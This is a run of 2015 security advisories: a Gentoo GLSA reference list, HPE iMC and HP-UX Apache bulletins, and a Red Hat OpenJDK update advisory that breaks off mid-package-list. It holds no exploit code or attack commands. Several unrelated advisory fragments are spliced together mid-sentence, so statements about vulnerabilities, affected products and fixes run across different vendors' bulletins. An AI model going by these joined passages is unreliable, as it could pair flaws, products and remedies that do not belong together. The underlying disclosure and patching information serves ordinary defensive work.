] CVE-2015-7188\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7188\n[ 52 ] CVE-2015-7189\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7189\n[ 53 ] CVE-2015-7191\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7191\n[ 54 ] CVE-2015-7192\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7192\n[ 55 ] CVE-2015-7193\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7193\n[ 56 ] CVE-2015-7194\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7194\n[ 57 ] CVE-2015-7195\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7195\n[ 58 ] CVE-2015-7196\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7196\n[ 59 ] CVE-2015-7197\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7197\n[ 60 ] CVE-2015-7198\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7198\n[ 61 ] CVE-2015-7199\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7199\n[ 62 ] CVE-2015-7200\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7200\n[ 63 ] CVE-2015-7201\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7201\n[ 64 ] CVE-2015-7202\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7202\n[ 65 ] CVE-2015-7203\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7203\n[ 66 ] CVE-2015-7204\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7204\n[ 67 ] CVE-2015-7205\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7205\n[ 68 ] CVE-2015-7207\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7207\n[ 69 ] CVE-2015-7208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7208\n[ 70 ] CVE-2015-7210\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7210\n[ 71 ] CVE-2015-7211\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7211\n[ 72 ] CVE-2015-7212\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7212\n[ 73 ] CVE-2015-7213\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7213\n[ 74 ] CVE-2015-7214\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7214\n[ 75 ] CVE-2015-7215\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7215\n[ 76 ] CVE-2015-7216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7216\n[ 77 ] CVE-2015-7217\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7217\n[ 78 ] CVE-2015-7218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7218\n[ 79 ] CVE-2015-7219\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7219\n[ 80 ] CVE-2015-7220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7220\n[ 81 ] CVE-2015-7221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7221\n[ 82 ] CVE-2015-7222\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7222\n[ 83 ] CVE-2015-7223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7223\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201512-10\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. These vulnerabilities could be exploited\nremotely resulting in disclosure of information and other impacts including:\n\n - The MD5 Message-Digest Algorithm is not collision resistant, which makes\nit easier for context-dependent attackers to conduct spoofing attacks, as\ndemonstrated by attacks on the use of MD5 in the signature algorithm of an\nX.509 certificate. \n - HPE iMC PLAT - Please refer to the RESOLUTION\n below for a list of impacted products. \n\n + **iMC PLAT - Version: IMC PLAT 7.2, E0403P10**\n\n - JD125A HP IMC Std S/W Platform w/100-node\n - JD126A HP IMC Ent S/W Platform w/100-node\n - JD808A HP IMC Ent Platform w/100-node License\n - JD814A HP A-IMC Enterprise Edition Software DVD Media\n - JD815A HP IMC Std Platform w/100-node License\n - JD816A HP A-IMC Standard Edition Software DVD Media\n - JF288AAE HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n - JF289AAE HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n - JF377A HP IMC Std S/W Platform w/100-node Lic\n - JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU\n - JF378A HP IMC Ent S/W Platform w/200-node Lic\n - JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU\n - JG546AAE HP IMC Basic SW Platform w/50-node E-LTU\n - JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n - JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\n - JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU\n - JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n - JG550AAE HPE PCM+ Mobility Manager to IMC Basic WLAN Platform Upgrade\n50-node and 150-AP E-LTU\n - JG590AAE HPE IMC Basic WLAN Manager Software Platform 50 Access Point\nE-LTU\n - JG660AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance\nEdition E-LTU\n - JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU\n - JG767AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance\nEdition E-LTU\n - JG768AAE HPE PCM+ to IMC Standard Software Platform Upgrade with\n200-node E-LTU\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04832246\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04832246\nVersion: 1\n\nHPSBUX03512 SSRT102254 rev.1 - HP-UX Web Server Suite running Apache, Remote\nDenial of Service (DoS) and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-10-15\nLast Updated: 2015-10-15\n\nPotential Security Impact: Remote Denial of Service (DoS), access restriction\nbypass, unauthorized modification, disclosure of information, local access\nrestriction bypass\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX Web Server\nSuite running Apache. These vulnerabilities could be exploited remotely to\ncreate a Denial of Service (DoS) and other impacts including... \n\n - The TLS vulnerability using US export-grade 512-bit keys in\nDiffie-Hellman key exchange known as \"Logjam\" could be exploited remotely to\nallow unauthorized modification. \n - The RC4 stream cipher vulnerability in SSL/TLS known as \"Bar Mitzvah\"\ncould be exploited remotely to allow disclosure of information. \n\nReferences:\n\nCVE-2013-5704\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2015-3183\nCVE-2015-4000 - \"Logjam\"\nCVE-2015-2808 - \"Bar Mitzvah\"\nSSRT102254\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX Web Server Suite 2.2.15.21 Apache\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-5704 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-3183 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-4000 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-2808 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following software updates to resolve the vulnerabilities\nwith HP-UX Web Server Suite running Apache. \n\n The updates are available for download from http://software.hp.com\n\n NOTE: HP-UX Web Server Suite v3.31 HPUXWSATW331 contains the following\ncomponents:\n\n - Apache v2.2.15.23\n - Tomcat Servlet Engine 5.5.36.02\n - PHP 5.2.17.04\n\n HP-UX 11i Release\n Apache Depot name\n\n B.11.23 (11i v2 32-bit)\n HP_UX_11.23_HP_UX_11.23_HPUXWS22ATW-B331-11-23-32.depot\n\n B.11.23 (11i v2 64-bit)\n HP_UX_11.23_HP_UX_11.23_HPUXWS22ATW-B331-11-23-64.depot\n\nMANUAL ACTIONS: Yes - Update\nDownload and install the software update\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\n=============\nhpuxws22APACHE32.APACHE\nhpuxws22APACHE32.APACHE2\nhpuxws22APACHE32.AUTH_LDAP\nhpuxws22APACHE32.AUTH_LDAP2\nhpuxws22APACHE32.MOD_JK\nhpuxws22APACHE32.MOD_JK2\nhpuxws22APACHE32.MOD_PERL\nhpuxws22APACHE32.MOD_PERL2\nhpuxws22APACHE32.PHP\nhpuxws22APACHE32.PHP2\nhpuxws22APACHE32.WEBPROXY\nhpuxws22APACHE32.WEBPROXY2\nhpuxws22APACHE.APACHE\nhpuxws22APACHE.APACHE2\nhpuxws22APACHE.AUTH_LDAP\nhpuxws22APACHE.AUTH_LDAP2\nhpuxws22APACHE.MOD_JK\nhpuxws22APACHE.MOD_JK2\nhpuxws22APACHE.MOD_PERL\nhpuxws22APACHE.MOD_PERL2\nhpuxws22APACHE.PHP\nhpuxws22APACHE.PHP2\nhpuxws22APACHE.WEBPROXY\nhpuxws22APACHE.WEBPROXY2\naction: install revision B.2.2.15.18 or subsequent\n\nhpuxws22TOMCAT32.TOMCAT\nhpuxws22TOMCAT.TOMCAT\naction: install revision C.6.0.35.01 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 15 October 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section. Customers unable to apply the update should contact\nHPE Support to discuss options. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2015:1229-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1229.html\nIssue date: 2015-07-15\nCVE Names: CVE-2015-2590 CVE-2015-2601 CVE-2015-2621 \n CVE-2015-2625 CVE-2015-2628 CVE-2015-2632 \n CVE-2015-2808 CVE-2015-4000 CVE-2015-4731 \n CVE-2015-4732 CVE-2015-4733 CVE-2015-4748 \n CVE-2015-4749 CVE-2015-4760 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix multiple security issues are\nnow available for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Critical security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit. \n\nMultiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2015-4760,\nCVE-2015-2628, CVE-2015-4731, CVE-2015-2590, CVE-2015-4732, CVE-2015-4733)\n\nA flaw was found in the way the Libraries component of OpenJDK verified\nOnline Certificate Status Protocol (OCSP) responses. An OCSP response with\nno nextUpdate date specified was incorrectly handled as having unlimited\nvalidity, possibly causing a revoked X.509 certificate to be interpreted as\nvalid. (CVE-2015-4748)\n\nIt was discovered that the JCE component in OpenJDK failed to use constant\ntime comparisons in multiple cases. An attacker could possibly use these\nflaws to disclose sensitive information by measuring the time used to\nperform operations using these non-constant time comparisons. \n(CVE-2015-2601)\n\nA flaw was found in the RC4 encryption algorithm. When using certain keys\nfor RC4 encryption, an attacker could obtain portions of the plain text\nfrom the cipher text without the knowledge of the encryption key. \n(CVE-2015-2808)\n\nNote: With this update, OpenJDK now disables RC4 TLS/SSL cipher suites by\ndefault to address the CVE-2015-2808 issue. Refer to Red Hat Bugzilla bug\n1207101, linked to in the References section, for additional details about\nthis change. \n\nA flaw was found in the way the TLS protocol composed the Diffie-Hellman\n(DH) key exchange. A man-in-the-middle attacker could use this flaw to\nforce the use of weak 512 bit export-grade keys during the key exchange,\nallowing them do decrypt all traffic. (CVE-2015-4000)\n\nNote: This update forces the TLS/SSL client implementation in OpenJDK to\nreject DH key sizes below 768 bits, which prevents sessions to be\ndowngraded to export-grade keys. Refer to Red Hat Bugzilla bug 1223211,\nlinked to in the References section, for additional details about this\nchange. \n\nIt was discovered that the JNDI component in OpenJDK did not handle DNS\nresolutions correctly. An attacker able to trigger such DNS errors could\ncause a Java application using JNDI to consume memory and CPU time, and\npossibly block further DNS resolution. (CVE-2015-4749)\n\nMultiple information leak flaws were found in the JMX and 2D components in\nOpenJDK. An untrusted Java application or applet could use this flaw to\nbypass certain Java sandbox restrictions. (CVE-2015-2621, CVE-2015-2632)\n\nA flaw was found in the way the JSSE component in OpenJDK performed X.509\ncertificate identity verification when establishing a TLS/SSL connection to\na host identified by an IP address. In certain cases, the certificate was\naccepted as valid if it was issued for a host name to which the IP address\nresolves rather than for the IP address. (CVE-2015-2625)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1207101 - CVE-2015-2808 SSL/TLS: \"Invariance Weakness\" vulnerability in RC4 stream cipher\n1223211 - CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks\n1241965 - CVE-2015-2625 OpenJDK: name for reverse DNS lookup used in certificate identity check (JSSE, 8067694)\n1242019 - CVE-2015-2601 OpenJDK: non-constant time comparisons in crypto code (JCE, 8074865)\n1242232 - CVE-2015-2628 OpenJDK: IIOPInputStream type confusion vulnerability (CORBA, 8076376)\n1242234 - CVE-2015-4731 OpenJDK: improper permission checks in MBeanServerInvocationHandler (JMX, 8076397)\n1242240 - CVE-2015-4732 OpenJDK: insufficient context checks during object deserialization (Libraries, 8076405)\n1242275 - CVE-2015-4733 OpenJDK: RemoteObjectInvocationHandler allows calling finalize() (RMI, 8076409)\n1242281 - CVE-2015-4748 OpenJDK: incorrect OCSP nextUpdate checking (Libraries, 8075374)\n1242372 - CVE-2015-2621 OpenJDK: incorrect code permission checks in RMIConnectionImpl (JMX, 8075853)\n1242379 - CVE-2015-4749 OpenJDK: DnsClient fails to release request information after error (JNDI, 8075378)\n1242394 - CVE-2015-2632 ICU: integer overflow in LETableReference verifyLength() (OpenJDK 2D, 8077520)\n1242447 - CVE-2015-4760 ICU: missing boundary checks in layout engine (OpenJDK 2D, 8071715)\n1243139 - CVE-2015-2590 OpenJDK: deserialization issue in ObjectInputStream.readSerialData() (Libraries, 8076401)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm\n\nppc64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\n\ns390x:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.ael7b_1.src.rpm\n\nppc64le:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 